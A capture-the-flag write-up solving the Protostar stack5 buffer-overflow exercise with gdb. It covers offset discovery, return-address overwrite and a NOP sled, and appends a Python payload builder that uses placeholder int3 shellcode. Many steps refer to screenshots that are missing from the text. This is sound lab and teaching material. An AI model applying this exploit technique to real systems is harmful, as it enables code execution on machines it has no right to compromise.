Today we will try to solve the next part of the Protostar CTF: stack5. Below you will find the details. Here we go...
We will start here:
As you can see, we have a buffer to overflow, so let's try to do that :) First, running the program just to see it in action:
Now let's open stack5 in gdb:
As you can see, I like to set two more options when using gdb:
- set disassembly-flavor intel (Intel syntax instead of the default AT&T)
- set pagination off (no "--Type <RET> for more--" prompts when listing)
Reading the listing, we can see that there is a leave instruction (at main+21), so let's set a breakpoint (b) there. Running with our 'payload' (from /tmp/x1), we end up here:
Next we will check where our payload sits in memory at ESP:
Next, I decided to prepare a new payload, this time using Metasploit's
Restarting the app with the new payload:
So far, so good. Our payload is visible at ESP; type c (continue) to proceed:
Now it should be easier to get the offset: the pattern bytes that landed in EIP tell us exactly how far into the buffer the saved return address is:
Checking with the new payload:
Looking for the address we will overwrite:
So now, adding a NOP sled:
Last stage, preparing the shellcode: we will use the one I found on shell-storm:
Not yet; fixing:
Cool. :) Next?
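The whole procedure above (a cyclic pattern to find the offset, then padding + return address + NOP sled + shellcode) in one script, as an added example that is not the original post's code. It re-implements what Metasploit's pattern_create.rb / pattern_offset.rb do so it runs offline; the OFFSET, RET_ADDR and int3 "shellcode" values are placeholders I chose (assumptions, not values from the post) and must be replaced with what your own gdb session shows.

```python
# Added example for this write-up, not the original post's code: a stand-alone
# stand-in for Metasploit's pattern_create.rb / pattern_offset.rb plus the final
# payload layout used against a gets()-style overflow such as Protostar stack5.
# OFFSET, RET_ADDR and the int3 shellcode below are placeholders (assumptions);
# take the real values from your own gdb session.
import string
import struct
import sys


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern Aa0Aa1Aa2... (upper, lower, digit)."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # caller asked for more than the 20280-byte pattern holds


def pattern_offset(value, length=20280):
    """Offset of a 4-byte chunk in the pattern. `value` is either the int gdb
    shows in EIP (unpacked little-endian) or the raw 4 bytes. None if absent."""
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    return None if idx < 0 else idx


def build_payload(offset, ret_addr, shellcode, nop_len=64):
    """Layout: [padding up to saved EIP][ret_addr, little-endian][NOP sled][shellcode].
    ret_addr must point into the sled. gets() stops at a newline byte (0x0a), so
    a 0x0a anywhere in the payload would truncate it; refuse to emit one."""
    payload = (b"A" * offset + struct.pack("<I", ret_addr)
               + b"\x90" * nop_len + shellcode)
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a; gets() would stop reading there")
    return payload


# Placeholder values (assumptions, not from the post). Four int3 bytes as the
# "shellcode" make gdb report SIGTRAP the moment execution lands in the sled,
# which confirms the offset and return address before real shellcode goes in.
OFFSET = 76
RET_ADDR = 0xBFFFF8C0
SHELLCODE = b"\xcc" * 4

if __name__ == "__main__":
    # python3 stack5_payload.py > /tmp/x1    then in gdb:  r < /tmp/x1
    sys.stdout.buffer.write(build_payload(OFFSET, RET_ADDR, SHELLCODE))
```

Two caveats worth keeping in mind when you swap in real values: the stack addresses gdb shows can differ by a few bytes from those outside the debugger (the environment is laid out differently), which is exactly why the NOP sled is there; and because the program reads its input with gets() from stdin, a shell spawned from a file-redirected stdin sees EOF at once and exits, so feed the payload with something like `(cat /tmp/x1; cat) | ./stack5` to keep stdin open.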
See you soon...